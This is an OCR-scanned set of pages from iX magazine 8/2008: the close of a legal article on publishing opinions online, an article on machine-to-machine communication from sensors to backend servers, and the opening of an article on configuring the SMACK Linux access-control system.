gemessen Rücksicht zu nehmen. Wenn 


dieser ein überwiegendes Interesse an 
einer Löschung hat, etwa weil sich der 
Beitrag in einem Bewerbungsverfah- 
ren sonst nachteilig auswirken könnte, 
müsste ein solcher Anspruch wenigs- 
tens in eindeutigen Fällen gerichtlich 
durchsetzbar sein. Problematischer und 
unter Umständen auch deutlich teurer 
wird es, wenn der Forenbetreiber sei- 
nen Sitz im Ausland hat und das Ge- 
richt eines anderen Landes in Anspruch 
zu nehmen ist. 

Auf der (fast) sicheren Seite ist man, 
wenn man Forenbeiträge nur unter 
Pseudonym verfasst und man davon 
ausgehen kann, dass der Forenbetreiber 
den tatsächlichen Namen nicht ohne 
Weiteres an Dritte herausgibt. Da die 
staatlichen Stellen im Ernstfall Zugriff 
auf diese Nutzerdaten haben, schützt 
das Schreiben unter Nickname aber 
nicht vor einer strafrechtlichen Verfol- 
gung, etwa wegen Beleidigung. 

Juristisch nicht eindeutig zu lösen ist 
der Fall, dass jemand seine Meinungs- 
äußerung zunächst als Leserbrief an ein 
Printmedium schickt, dieses den Brief 
aber anschließend im Internet veröffent- 
licht — was für den Schreiber vielleicht 
nicht unbedingt vorhersehbar war. Auch 
hier kommt es auf die Umstände des 
Einzelfalls an. Zunächst einmal muss 
man klären, ob „Leserbriefbedingun- 
gen“ gelten, denen sich der Leser unter- 
worfen hat. Steht darin, dass eine Nut- 
zung außer in der gedruckten Zeitschrift 
auch im Internet gestattet ist, ist der Fall 
klar. Eine Veröffentlichung im Internet 
durch den Verlag ist statthaft. 

Wenn das nicht der Fall ist und der 
Leser nicht aus den Umständen schlie- 
ßen konnte, dass eine solche Veröffent- 
lichung erfolgen würde, greift gegebe- 
nenfalls das Urheberrechtsgesetz. Hat 
der Leserbrief eine bestimmte Schöp- 
fungshöhe — vulgo Originalität — und 
ist somit urheberrechtlich geschützt, 
wäre seine Veröffentlichung im Inter- 
net eine Änderung der Nutzungsart und 
könnte vom Leser untersagt werden. 

Aber auch wenn kein Urheberrechts- 
schutz besteht, ist der Leser nicht grund- 
sätzlich schutzlos. Da eine Verbrei- 
tung einer Lesermeinung im Internet 


ClaimlD  claimid.com 
myON-ID  www.myonid.de 
Spock www.spock.com 
Naymz WWW.naymz.com 
Yasni www.yasni.de 
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eine ganz andere Öffentlichkeitswir- 
kung hat als in einer Zeitschrift, wird 
man juristisch wohl eine Abwägung 
der Interessen des Verlags und des Au- 
tors vornehmen müssen. Ist das Persön- 
lichkeitsrecht des Lesers berührt, dürfte 
dies in den meisten Fällen den Aus- 
schlag geben. Unterschiede dürften ge- 
rade zwischen Tageszeitungen mit ho- 
her Auflage und Fachzeitschriften mit 
kleiner Auflage bestehen. Urteile aus 
diesem Bereich sind ebenfalls noch 
nicht bekannt. 


Fazit 


Das Internet droht für viele zur Falle zu 
werden, wenn sie darin ihre Meinung 
allzu offen kundtun und dies beispiels- 
weise bei einem Bewerbungsgespräch 
oder der Gründung einer Firma negativ 
zu Buche schlagen könnte. Durch Such- 
maschinen wie Yasni ist es binnen Se- 
kunden möglich, sich einen Überblick 
über die Netzaktivitäten einer Person zu 
verschaffen. Wer nicht gerade einen 
Allerweltsnamen hat, bei dem der Ein- 
zelne unter einer Vielzahl Gleichnami- 
ger untergeht, sollte vorsichtig sein. 
Zwar kann man seine Einträge in sozia- 
len Netzwerken in der Regel auch wie- 
der löschen, sicheren Schutz vor nach- 
träglichem Auffinden — in Archiven 
etwa — bietet das aber nicht. 

Wer seine eigene Meinung äußert, tut 
gut daran, dies nur unter einem Pseudo- 
nym zu tun oder bei Offlinemedien zu 
klären, in welcher Art und Weise Le- 
serbriefe, Forenbeiträge et cetera durch 
den Verlag oder Betreiber verwendet 
werden. Kein Risiko geht ein, wer pri- 
vate Daten, persönliche Meinungen 
und Ähnliches gar nicht erst veröffent- 
licht. Die Nutzung eines Pseudonyms 
ist insbesondere bei Meinungsforen 
angebracht. 

Andererseits kann die bewusste 
Streuung persönlicher Daten — etwa 
von Lebensläufen oder Tätigkeiten in 
sozialen Netzwerken - auch eine Form 
der Eigenwerbung sein. Wer verant- 
wortungsbewusst damit umgeht und 
sich den Betreiber vorher etwas genau- 
er ansieht, vermeidet (juristischen) Är- 
ger und nutzt gleichzeitig das Internet 
auf geschickte Weise. (ur) 


TOBIAS HAAR, LL.M., 


ist Rechtsanwalt mit Schwerpunkt 
IT-Recht. 


Eix-ink ix0808107 R 


iX 8/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


109 


Embedded Systems 


M2M-Kommunikation - vom Sensor bis zum Webportal 


Maschinengespräc 


Klaus-Dieter Walter 


M2M steht als Abkürzung für „Machine-to-Machine”. 

Gemeint ist damit der automatisierte Datenaustausch zwischen 
beliebigen Geräten. Weiter gedacht ist M2M eine der technischen 
Voraussetzungen für das gerne zitierte „Internet der Dinge”. 


ine herstellerneutrale Ant- 
3 wort auf die Frage „Was 

ist M2M”“ zu finden, ist 
nicht ganz einfach. 

Für die Betreiber von 
GSM-Funknetzen - klassische 
Mobilfunkprovider wie T-Mo- 
bile oder Vodafone — sind da- 
mit zum Beispiel automatisier- 
te Messwertübertragungen per 
SMS beziehungsweise GSM/ 
GPRS/UMTS oder Fernwar- 
tungsanwendungen über die 
Handy-Funknetze gemeint. 
Anbieter von GSM-Funkmo- 
dems, in vielen M2M-Anwen- 
dungen zur Datenübertragung 
über Mobilfunknetze im Ein- 
satz, sehen das erfahrungsge- 
mäß genauso. Hersteller von 
Bluetooth- oder Zigbee-Funk- 
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chips verstehen unter M2M 
in der Regel AMR - Auto- 
matic Meter Reading, die 
Funkübertragung von Ver- 
brauchsdaten, oder ähnliche 
Anwendungen. Da gibt es aus 
Sicht eines Halbleiterherstel- 
lers ein riesiges Marktpotenzi- 
al. („Smart Metering: An jeden 
Heizkörper und in jeden Zähler 
gehört ein Funkchip.“). Durch 
die intensive Öffentlichkeits- 
arbeit dieser Marktteilnehmer 
ist in den letzten Jahren ein 
mehr oder weniger diffuses 
Bild entstanden. Darum zu- 
nächst ein paar grundsätzli- 
che Klärungen. 

Eine M2M-Anwendung be- 
steht aus vier elementaren 
Bausteinen: 


1. Sensoren und Aktoren, die 
über ein Wireless Sensor Net- 
work (WSN) miteinander ge- 
koppelt sind, 
2. dem M2M Device als Da- 
tenendpunkt für die Sensor- 
und Aktordaten, 
3, einem Backend-Server als 
Datenaggregationspunkt für 
alle M2M Devices einer An- 
wendung sowie 
4. dem Kommunikationsnetz- 
werk als Bindeglied zwischen 
den M2M Devices und dem 
Backend-Server (M2M Com- 
munication Network, zum Bei- 
spiel ein drahtloses oder draht- 
gebundenes LAN, MAN oder 
WAN [1]). 

Sensoren, Aktoren und 
M2M Devices kommen in- 


nerhalb einer Anwendung 
mehrfach vor, der Backend- 
Server in der Regel nur ein- 
mal. Sinn und Zweck einer 
solchen Lösung ist in erster 
Linie die dezentrale Datener- 
fassung und -verdichtung. 
Auf die Daten auf dem Back- 
end-Server kann eine überge- 
ordnete IT-Anwendung oder 
ein Benutzer zugreifen. Ein 
typisches Anwendungsbeispiel 
wäre eine Monitoring-Anwen- 
dung an Windkraftwerken, 
etwa um rechtzeitig das sich 
abzeichnende Versagen me- 
chanischer Komponenten zu 
erkennen. 

Genau genommen fällt ei- 
ne M2M-Anwendung unter 
den wissenschaftlichen Ober- 
begriff der Telematik. Dieses 
Kunstwort setzt sich aus Te- 
lekommunikation und Infor- 
matik zusammen. Die beiden 
begriffsformenden Bereiche 
kennzeichnen die Grundidee: 
Mindestens zwei Rechnersys- 
teme — ausgerüstet mit einer 
speziellen Software - sind via 
Telekommunikation miteinan- 
der vernetzt, den Mehrwert 
liefert das Zusammenspiel 
beider Systeme. Die gegen- 
wärtig bekanntesten Telema- 
tikanwendungen sind mobile 
Navigationssysteme; die ver- 
netzten Systeme sind hier die 
GPS-Satelliten und ein PDA. 


Sensoren, Aktoren, 
M2M Devices 


Sensoren wandeln physikali- 
sche Größen und chemische 
Effekte in weiterverarbeit- 
bare Größen, zumeist elektri- 
sche Spannungen oder Ströme, 
die sich einfach digitalisieren 
lassen. Typische Beispiele 
sind Temperatur-, Feuchtig- 
keits-, Beschleunigungs- und 
Gas-Sensoren. Sie bilden das 
Nervensystem einer M2M- 
Anwendung. Aktoren sind 
Elemente, die eine Eingangs- 
größe in eine andersartige Aus- 
gangsgröße umwandeln. Ein 
typisches Beispiel im Zu- 
sammenhang mit einer M2M- 
Anwendung wäre ein Mag- 
netventil, das den Durchfluss 
einer Flüssigkeit (Ausgangs- 
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größe) mit einem elektrischen 
Strom (Eingangsgröße) steuert. 
Da die meisten M2M-An- 
wendungen der Datenerfas- 
sung dienen, sind Sensoren 
deutlich wichtiger als Aktoren. 
Sensoren liefern objektive In- 
formationen über Produktions-, 
Labor-, gebäude- und umwelt- 
technische Prozesse. Je mehr 
Sensoren in einer Anwendung 
zum Einsatz kommen, desto 
höherwertiger ist die Qualität 
der auf dem Backend-Server 
gesammelten Daten. Aktoren 
dienen der Beeinflussung be- 
stimmter Prozessparameter und 
kommen daher in der M2M- 
Welt deutlich seltener zum 
Einsatz. Sie sind in erster Linie 
in Steuerungen und Regelun- 
gen zu finden. In der folgen- 
den Beschreibung dient daher 
der Begriff „Sensor“ als Stell- 
vertreter für Sensor und Aktor. 
Die Verbindung zwischen 
Sensor und dem M2M Device 
lässt sich grundsätzlich so- 
wohl drahtgebunden als auch 
drahtlos realisieren. Durch die 
aktuellen Entwicklungen im 
Bereich der Low-Power-Funk- 
technologien [2] werden draht- 
lose Verfahren zunehmend 
sinnvoller. Wireless Sensor 
Networks (WSN) sind in in- 
dustriellen Umgebungen rela- 
tiv leicht zu installieren und 
erheblich flexibler als draht- 
gebundene Lösungen. 
Grundsätzlich eignet sich 
praktisch jeder ISM-Fre- 
quenzbereich für die Anbin- 
dung der Sensoren an ein 
M2M Device (ISM: Industri- 
al, Scientific, and Medical; 
Frequenzbereiche zur lizenz- 
freien Audio-, Video- oder 
Datenübertragung). Besonders 
empfehlenswert sind die Sub- 
1-GHz-Bereiche bei 868 MHz 


Sensoren 


Wireless 
Sensor 
Network 
(WSN) 


Sensoren 


Sensoren 


Data End 


(DEP) 
M2M Device 


M2M 
Communication 
Network 

(MEN) 


webbasierter Zugriff 


Backend-Server 


Vom Sensor zum Backend-Server - das Grundkonzept einer M2M-Anwendung (Abb. 1). 


in Europa und 915 MHz in 
den USA sowie der Frequenz- 
bereich bei 2,4 GHz, der welt- 
weit bis auf wenige Ausnah- 
men einheitlich geregelt ist. 
Für den Frequenzbereich 
868 MHz existiert in Europa 
ein umfangreiches Regelwerk. 
So sind eine relative Einschalt- 
dauer (Duty Cycle = DC) oder 
ein Listen-Before-Talk-Zugriff 
(LBT) für Sender im 868- 
MHz-Band zusammen mit der 
maximalen Kanalbelegungs- 
dauer ebenso wie die mini- 
mal erforderlichen Ruhepau- 
sen vorgeschrieben. Dadurch 
ist sichergestellt, dass jede An- 
wendung zum Zuge kommt 
und nicht eine einzelne Fre- 
quenz blockiert wird. Das Zeit- 
verhalten für die Übertragung 
der Sensordaten lässt sich hier 
allerdings nicht vorhersagen. 
Die Übermittlung einer Mes- 
sung kann sich schon einige 
Sekunden verzögern. 


Freie und weniger 
freie Frequenzen 


Für die 915 MHz in den USA 
gibt es keine DC- und LBT- 
Beschränkungen. Hier be- 
steht die Gefahr, dass die 
drahtlose Sensorik einer M2M- 
Anwendung nicht fehlerfrei 
läuft, weil in direkter Nähe 
andere 915-MHz-Anwendun- 


Kommunikationsnetzwerk. 


A-TRACT 


© Maschine-zu-Maschine-Kommunikation (M2M)] besteht 
aus vier elementaren Bausteinen: Sensoren und Aktoren, 
dem M2M Device, einem Backend-Server sowie dem 


© Die Kommunikation zwischen den Bausteinen erfolgt 
zunehmend drahtlos und in der Regel IP-basiert. 


© Für den Datenaustausch stehen Standardisierungen noch aus. 


iX 8/2008 


gen das Frequenzband kom- 
plett belegen. 

Ein ISM-Frequenzbereich 
mit weltweit nahezu einheit- 
licher Regulierung ist das 2,4- 
GHz-Band. Speziell in Zu- 
sammenhang mit drahtlosen 
Sensornetzwerken haben sich 
hier mit IEEE 802.15.4, Zig- 
bee, WirelessHART und ISA 
SP100 [3] inzwischen ver- 
schiedene Standards und Spe- 
zifikationen entwickelt, die 
sich für den Einsatz in M2M- 
Anwendungen eignen. Im 2,4- 
GHz-Bereich tummeln sich 
noch sehr viele andere An- 
wendungen. Bluetooth und 
IEEE 802.11b/g (Wi-Fi/ 
WLAN) sind die bekanntes- 
ten, darüber hinaus gibt es 
drahtlose Audio- und Video- 
übertragungen sowie andere 
proprietäre Lösungen für den 
Datenfunk. Da keine DC- und 
LBT-Einschränkungen defi- 
niert sind, ergeben sich in der 
Praxis hin und wieder Koexis- 
tenzprobleme [4]. 

Die Dämpfung durch die 
Materie ist für niedrige Fre- 
quenzen geringer als für ho- 
he Frequenzen. Aus diesem 
Grund ist — zumindest theo- 
retisch — bei gleicher Emp- 
fängerempfindlichkeit für 900- 
MH2z-Funkwellen eine etwa 
dreifache Funkreichweite im 
Vergleich zu 2,4 GHz [5] zu 
erwarten. Zudem durchdrin- 
gen niederfrequente elektro- 
magnetische Wellen Wände 
und andere Hindernisse deut- 
lich besser als höherfrequente. 

Unter dem Strich lässt sich 
die Funkreichweite für Sen- 
sornetzwerke in M2M-An- 
wendungen schlecht vorhersa- 
gen. Sie hängt im Einzelfall 
von der jeweiligen Umgebung 
und den Details der Instal- 
lation ab. Hinzu kommen 
grundsätzliche Aspekte der 


drahtlosen Kommunikation. 
So besteht zwischen der zu 
überbrückenden Distanz und 
der dafür erforderlichen Sen- 
deenergie ein etwa quadra- 
tischer Zusammenhang [6]. 
Weiterhin gilt: Je mehr Sen- 
deenergie aufgebracht werden 
muss, desto größer ist der 
Strombedarf - ein zentraler 
Gesichtspunkt für batterie- 
betriebene Sensoren. 

Im einfachsten Fall bildet 
das M2M Device mit den Sen- 
soren ein sternförmiges Funk- 
netzwerk. Jeder Sensor als Da- 
tenquelle muss eine direkte 
Funkverbindung zum M2M 
Device besitzen und über 
ausreichende Sendeleistung 
beziehungsweise Empfangs- 
empfindlichkeit verfügen. Al- 
ternativ kann Multi-hop Mesh 
Networking [2] eingesetzt 
werden, wie es Zigbee und 
WirelessHART nutzen. Jeder 
Sensor ist gleichzeitig Funk- 
router und muss nur die Ent- 
fernung zum nächsten Nach- 
barn überbrücken. Nur ein 
einziger Sensor benötigt eine 
direkte Funkverbindung zum 
M2M Device, alle anderen 
besitzen lediglich eine indi- 
rekte Verbindung zum M2M 
Device als Datensenke. 


Das M2M Device 
als Bindeglied 


Ein M2M Device soll über ein 
Interface mithilfe der Senso- 
ren Daten aus der Umwelt 
aufnehmen, aufbereiten und 
an ein Kommunikationsnetz- 
werk weiterleiten. Gleichzei- 
tig muss es eine Möglichkeit 
geben, über Aktoren spezielle 
Parameter in der Umgebung 
zu beeinflussen. Dafür ist 
grundsätzlich ein Mikrorech- 
nersystem mit der entspre- 
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Embedded Systems 


chenden Software (Firmware) 
erforderlich. 

Leistungsmerkmale, Archi- 
tektur, mechanische Abmes- 
sungen und Schnittstellen, Ge- 
häuse, Spannungsversorgung 
und so weiter variieren in 
Abhängigkeit von der M2M- 
Applikation. Hier lässt sich 
kein allgemeingültiges Re- 
gelwerk aufstellen, entschei- 
dend ist die jeweilige An- 
wendung. 

So kann ein winziger 
Mikrocontroller mit gerade 
einmal 8 KByte RAM, 32 
KBytes Flash und einer inte- 
grierten Funkschnittstelle [a] 
zusammen mit einem speziel- 
len Sensorelement das M2M 
Device bilden. Dieses Gebilde 
benötigt für den Dauerbetrieb 
so wenig Energie, dass sie aus 
einer kleinen Solarzelle oder 
einem externen Thermogene- 
rator direkt aus der Umwelt 
gewonnen werden kann (Ener- 
gy Harvesting [b]). 

Oder das M2M-Device 
besteht aus einem industriel- 
len Box-PC mit AMD-Pro- 
zessor, 5l2 MByte RAM, 
Debian-Linux-Betriebssystem 
auf einer 1-GByte-Compact- 
flash-Speicherkarte, 10 se- 
riellen, 4 USB-, 2 Ethernet-, 
einer WLAN-Schnittstelle so- 
wie einem GSM-Funkmodem 
und weiteren Interfaces. 

Insgesamt gibt es keine 
wirklich umfassenden Charak- 
terisierungsmerkmale für ein 
M2M Device. Praktisch jedes 
programmierbare Rechnersys- 
tem eignet sich für die Aufga- 
ben einer solchen Funktions- 
einheit. Es müssen lediglich 
drei wichtige Merkmale gege- 
ben sein: 

— Über ein Sensor- oder Pro- 
zessdaten-Interface ist eine 


Der Backend-Server einer 
M2M-Anwendung dient als 
Datenintegrationspunkt 
(Abb. 2). 
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HTTP-Request, Daten 


Anbindung externer Daten- 
quellen möglich. 

— Die über das Sensor- oder 
Prozessdaten-Interface erfass- 
ten Daten können an ein Kom- 
munikationsnetzwerk weiter- 
geleitet werden. 

— Auf dem Rechnerkern muss 
eine M2M-bezogene Software 
ausführbar sein. Mit anderen 
Worten: Es muss sich um ei- 
ne mehr oder weniger offene 
Plattform handeln, die ein an- 
wendungsbezogenes Hard- 
und Software-Engineering er- 
möglicht. 


Drahtlos und 
drahtgebunden 


Eine besondere Bedeutung 
haben darüber hinaus die 
Schnittstellen zur Integration 
der Sensorik. Hier findet man 
sowohl typische Mikrocon- 
troller-Schnittstellen wie PC 
[7] und SPI [d] als auch ein- 
fache serielle Schnittstellen. 
Gelegentlich kommen auch 
komplexe serielle Schnittstel- 
len (USB) sowie spezielle 
Funk-Interfaces zum Einsatz, 
um das M2M Device als Da- 
tenendpunkt in ein drahtloses 
Sensornetzwerk einzubinden. 

Zusätzlich besitzt ein M2M 
Device eine Schnittstelle zur 
Kommunikation mit dem 
Backend-Server. Deren Aus- 
führung richtet sich nach dem 
Typ des zum Einsatz kommen- 
den MCN (M2M Communica- 
tion Network). 

Der Datenaustausch über 
dieses Netz ist grundsätzlich 
IP-basiert, physisch sind zahl- 
reiche Alternativen denkbar. 
Im einfachsten Fall kommen 
LAN/DSL oder WLAN zum 
Einsatz, Letzteres nur bei 


Apache, PHP, 
MySQL 


HTTP-Request 


vollständig lokalen Anwen- 
dungen, zum Beispiel in einer 
Halle oder auf einem größe- 
ren Gelände. 

Gegenwärtig werden auch 
GSM/GPRS/EDGE und neu- 
erdings UMTS/HSDPA häufig 
eingesetzt. Diese Mobilfunk- 
standards ermöglichen eine re- 
lativ flexible Standortwahl für 
die einzelnen M2M Devices, 
da zumindest GSM in den 
meisten Regionen nahezu flä- 
chendeckend vorhanden ist. 
Theoretisch zieht dieses Ver- 
fahren nicht unerhebliche 
Übertragungskosten nach sich, 
doch mittlerweile bieten viele 
Mobilfunkprovider spezielle 
M2M-Tarife an, sodass sich 
eine Anwendung mit wenigen 
Euro pro Monat je M2M De- 
vice realisieren lässt. 

Der Backend-Server einer 
M2M-Anwendung dient als 
Datenintegrationspunkt für die 
einzelnen M2M Devices. Er 
kann je nach Anwendung 
durch eine Software, die auf 
einem beliebigen Rechner zum 
Einsatz kommt, oder durch ei- 
ne spezielle Hard-Software- 
Kombination realisiert wer- 
den. Die primäre Aufgabe 
des Backend-Servers ist es, 
die Daten der einzelnen M2M 
Devices einzusammeln, zwi- 
schenzuspeichern, aufzuberei- 
ten und anderen Anwendun- 
gen zur Verfügung zu stellen. 

Ein Backend-Server be- 
sitzt daher immer mindestens 
zwei IP-Software-Schnittstel- 
len. Über die eine nimmt er 
Daten von den M2M Devices 
entgegen, sie ist mit dem 
MCN verbunden. Die andere 
Schnittstelle dient als Verbin- 
dung zu den übergeordneten 
IT-Anwendungen, etwa einer 
Unternehmensdatenbank oder 
einer ERP-Software, die die 
M2M-Daten weiterverarbei- 
ten sollen. Über diese Schnitt- 
stelle erfolgt in der Regel 
auch die Konfiguration des 
Backend-Servers und - in ei- 
nigen Fällen — der gesamten 
M2M-Anwendung. 

Ein Beispiel möge dies il- 
lustrieren (Abbildung 2): Den 
Backend-Server bildet das 
Software-Triumvirat Apache, 
MySQL und PHP. Die M2M 


Devices können mit einem 
HTTP-Request ihre Daten an 
Apache übergeben. Ein PHP- 
Skript speichert diese in einer 
MySQL-Datenbank. Die Wei- 
tergabe an eine IT-Appli- 
kation — oder auch einen 
menschlichen Nutzer - er- 
folgt nahezu identisch. Eine 
HTTP-Anforderung aktiviert 
ein PHP-Skript, das die ge- 
wünschten Daten im XML- 
Format oder als HTML-Seite 
mit eingebetteten Grafiken 
liefert. Über diese Schnittstel- 
le kann der Backend-Server 
auch interoperable XML-Web- 
services (SOAP, XML-RPC) 
anbieten. Allerdings stehen 
verbreitete Standardisierun- 
gen in diesem Zusammen- 
hang (XML-Schema o. Ä.) 
noch aus. Eindeutig ist dage- 
gen eine seit mittlerweile rund 
10 Jahren bestehende Ten- 
denz in Richtung Embedded 
Linux. 


Typische Anwen- 
dungsszenarien 


Die Anwendungsmöglichkei- 
ten für M2M-Konzepte sind 
vielfältig, hier seien einige ty- 
pische Beispiele etwas aus- 
führlicher vorgestellt. Im Ein- 
zelnen geht es jeweils darum, 
die speziellen Details be- 
stimmter Anwendungsgrup- 
pen aufzuzeigen und so die 
Basis für eigene M2M-Appli- 
kationen zu schaffen bezie- 
hungsweise individuelle An- 
forderungen und bestehende 
Anwendungen richtig einzu- 
ordnen. 

Eine M2M-Anwendung mit 
stark wachsendem Marktvo- 
lumen ist das Verfolgen und 
Überwachen mobiler Objekte, 
auch Tracking & Tracing 
(T & T) genannt. Bei den mo- 
bilen Objekten handelt es sich 
in erster Linie um Fahrzeuge 
aller Art. Dabei spielt es keine 
Rolle, ob sich diese Fahrzeuge 
zu Lande, in der Luft oder auf 
dem Wasser bewegen. Aber 
auch die Überwachung von 
Personen oder mobilen Gegen- 
ständen ohne eigenen Antrieb 
— zum Beispiel Containern — 
ist so möglich. Die technolo- 
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gische Basis bilden Kombina- 
tionen von GPS und GSM: 
Das mobile Objekt wird mit 
einem M2M Device ausgestat- 
tet, das aus einem GPS-Sensor, 
einem GSM-Modem und einer 
Batterie als Spannungsversor- 
gung besteht. Der Platzbedarf 
für solche Lösungen lässt sich 
gegenwärtig schon fast auf das 
Volumen einer Streichholz- 
schachtel reduzieren, das größ- 
te Bauteil ist in der Regel die 
Batterie. Ein solches M2M 
Device liest in bestimmten 
Intervallen oder aufgrund be- 
stimmter externer Ereignisse — 
wie eine Aufforderung per 
SMS - die aktuelle GPS-Posi- 
tion und sendet diese an den 
Backend-Server. Von hier aus 
können die Ortungsdaten an 
übergeordnete IT-Anwendun- 
gen weitergegeben werden. In 
vielen Fällen wird die aktuelle 
Position eines mobilen Objekts 
in elektronisches Kartenmate- 
rial — zum Beispiel Google 
Maps - eingespielt, zum Teil 
über Softwareschnittstellen 
wie die Google-Maps-API [e]. 

Neben den reinen Posi- 
tionsdaten lassen sich weite- 
re Sensordaten an den Back- 
end-Server übermitteln. So 
kann man mit einem solchen 
T&T-System die Einhaltung 
der Kühlkette bei Lebens- 
mitteltransporten oder die 
Beachtung der gesetzlichen 
Rahmenbedingungen beim 
Lkw-Transport lebender Tie- 
re (Ruhepausen, Temperatur, 
Öffnen der Ladeklappen und 
so weiter) in einer Datenbank 
protokollieren. 

Weitere typische M2M- 
Applikationen sind das Envi- 
ronment, Condition oder In- 


frastructure Monitoring. Un- 
zählige Anwendungen nutzen 
heute komplexe Geräteland- 
schaften, in denen die meisten 
Systeme ohne menschliches 
Zutun 24 Stunden täglich an 
sieben Tagen die Woche ihren 
Dienst verrichten. 


Ausfallsicherheit 
gefordert 


Fällt ein einzelnes Subsystem 
aus, ist die gesamte Anwen- 
dung zumindest teilweise ge- 
stört. Die Schwierigkeit ist, 
einen Ausfall möglichst sofort 
sicher zu erkennen. Ein typi- 
sches Beispiel sind die einzel- 
nen Pumpen in der Abwasser- 
aufbereitung einer Kommune. 
Versagt eine einzelne ihren 
Dienst, sind unter Umständen 
bestimmte Qualitätskriterien 
hinsichtlich der Wasserqua- 
lität nicht einzuhalten. Von je- 
der Störung muss das zustän- 
dige Personal unverzüglich 
erfahren. 

Genau genommen muss ei- 
ne gute Lösung eine Störung 
bereits vorab erkennen. So et- 
was nennt man dann Condi- 
tion Monitoring. Schließlich 
steigen Stromaufnahme und 
Temperatur einer Pumpe oder 
eines Elektromotors in der 
Regel schon lange vor dem ei- 
gentlichen Ausfall. 

Abbildung 3 zeigt als Bei- 
spiel die Strukturen für das 
Condition Monitoring in ei- 
nem Windpark, also einer 
räumlichen Ansammlung von 
Windenergieanlagen (WEA). 
Jedes Windrad verfügt über 
eine entsprechende Sensorik 
mit M2M Device, die den Zu- 


[a] Datenblätter zum Texas Instruments CC2480 
http: //focus.ti.com/lit/ds/symlink/cc248001.pdf 


[b] Energy Harvesting Forum 
www.energyharvesting.net 


[c] SPI Block Guide V.03.06. Freescale Semiconductor 


www.freescale.com 


[d] WISA - Wissensbasierte Systeme für die Anlagendiagnose 


www.ifak.eu 


[e] Beschreibung zur Google Maps AP| 
http: //code.google.com/apis/maps/ 
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Windpark 


Typische M2M- 


M2M 
Communication 
Network 
(MEN) 


stand sämtlicher Schlüssel- 
komponenten misst. Beispiele 
für Datenquellen sind die Tem- 
peratur und Laufgeräusche der 
Getriebe und des Generators, 
die Anzahl der Umdrehungen, 
die Geschwindigkeit des Ro- 
tors und so weiter. Die Daten 
aus jedem Windrad werden 
auf dem für die Anlage zustän- 
digen Backend-Server aufge- 
zeichnet und verdichtet. Sie 
stehen dort als Protokoll zur 
Verfügung, das beispielsweise 
bei einem Ausfall an den Ver- 
sicherer weitergeleitet werden 
kann. 
Betriebsunterbrechungsver- 
sicherungen für Windkraft- 
anlagen fordern in der Regel 
ein Condition Monitoring 
mit Langzeitdatenaufzeich- 
nung. Die Daten können dar- 
über hinaus aber auch über 
einen Webservice des Back- 
end-Servers an ein Experten- 
system innerhalb der IT des 
Betreibers oder Anlagenbau- 
ers weitergeben werden, das 
die kausalen Zusammenhän- 
ge zwischen den Symptomen 
der Schlüsselkomponenten — 
die aus den aktuellen Messda- 
ten erkennbar sind — und zu 
erwartenden Störungen kennt 
[d]. Der Grundgedanke lässt 
sich auch auf die Zustands- 
überwachung von einzelnen 
Blockheizkraftwerken über- 
tragen, die zusammen das vir- 
tuelle Kraftwerk eines Ener- 
gieversorgers bilden (siehe 
Abbildung 3). (JS) 
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Zugriffskontrolle 


Neue MAC-Variante im Linux-Kernel 


New Kid 
on the Block 


Ralf Spenneberg 


Mit SELinux und AppArmor existieren 

zwei Mandatory-Access-Control-Systeme 
für den Linux-Kernel. Ersteres wird häufig als 
zu kompliziert, AppArmor und andere 
pfadbasierende Systeme als nicht sicher 
genug dargestellt. SMACK ist wie SELinux 
labelbasiert, verzichtet aber auf eine 


komplexe Konfiguration. 


icherheit ist wichtig. Spe- 
5 ziell Betriebssysteme, die 

Verbindungen mit nicht 
vertrauenswürdigen Kommu- 
nikationspartnern aufbauen, 
müssen sicher sein. Die im- 
mer noch häufig eingesetzte 
Programmiersprache C verfügt 
allerdings über „Features“ wie 
Buffer Overflows und Format- 
String-Schwächen. Die we- 
nigsten Programmierer sind in 
der Lage, ihren Code so zu 
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gestalten, dass er frei von die- 
sen und anderen Sicherheits- 
lücken ist. Daher tendieren 
die Betriebssystemhersteller 
seit einiger Zeit zu alternati- 
ven Sicherheitsmechanismen. 

Red Hat und Debian setzen 
SELinux ein. Novell schwört 
auf AppArmor und Microsoft 
hat in Vista auch ein Manda- 
tory Integrity Control System 
integriert. Darüber hinaus stell- 
ten die Redmonder im letzten 


Herbst den Chefentwickler 
von AppArmor ein. Eines ha- 
ben Mandatory-Access-Con- 
trol-(MAC)-Systeme jedoch 
gemeinsam: Sie stehen alle im 
Ruf, kompliziert zu sein. Ca- 
sey Schaufler möchte dieses 
Vorurteil mit SMACK wider- 
legen. 

In Bezug auf Sicherheits- 
systeme ist Casey Schaufler 
kein unbeschriebenes Blatt. 
Er war Trusted-Solaris-Ent- 
wickler und an der ersten 
kommerziellen 32-Bit-Portie- 
rung von Unix beteiligt. An- 
schließend war er bei SGl als 
Architekt für Trusted IRIX 
zuständig und ist einer der 
Autoren des POSIX P1003. 
le/2c Draft. 


Ein kurzer Weg in 
den Default-Kernel 


Mit dem Simple Mandatory Ac- 
cess Control Kernel (SMACK) 
hat Casey Schaufler mit der 
Unterstützung einiger weite- 
rer Programmierer ein neues 
Mandatory Access Control 
System vorgestellt, das inner- 
halb nur eines Jahres die Auf- 
nahme in den Linux-Kernel 
schaffte. Während SMACK in 
vielen Bereichen noch einige 
Funktionen vermissen lässt, 
sind die bislang vorhandenen 
Fähigkeiten aber leicht zu ver- 
wenden. 

Für SMACK benötigt der 
Administrator einen aktuellen 
Linux-Kernel 2.6.25 oder neu- 
er, der mit den folgenden Ein- 
stellungen übersetzt worden 
sein muss: 


CONFIG_NETLABEL=y 
CONFIG_EXT3_FS_XATTR=y 
CONFIG_EXT3_FS_SECURITY=y 
CONFIG_SECURITY_SMACK=y 


Erst die Aktivierung der Op- 
tion NETLABEL erlaubt eine 
Auswahl von SMACK. Vor 
dem Systemneustart sollte 
der Administrator durch den 
Eintrag 


smackfs /smack smackfs 7 
smackfsdef=* 0 0 


in /etc/fstab sicherstellen, 
dass der Kernel beim System- 
start smackfs für die interne 


Kommunikation mit SMACK 
automatisch mountet. Des 
Weiteren sollte er eine Reihe 
zusätzlicher Dateien und Diens- 
te installieren. Casey Schau- 
fler stellt ein Init-Skript sowie 
Patches für die Busybox, die 
Coreutils und den OpenSSH- 
Server zur Verfügung, die 
SMACK für die Nutzung be- 
nötigt. Das Init-Skript lädt die 
von dem Administrator defi- 
nierten Regeln. Der Patch für 
die Busybox und die Coreutils 
stellt ein modifiziertes !s-Kom- 
mando bereit, dessen Ausgabe 
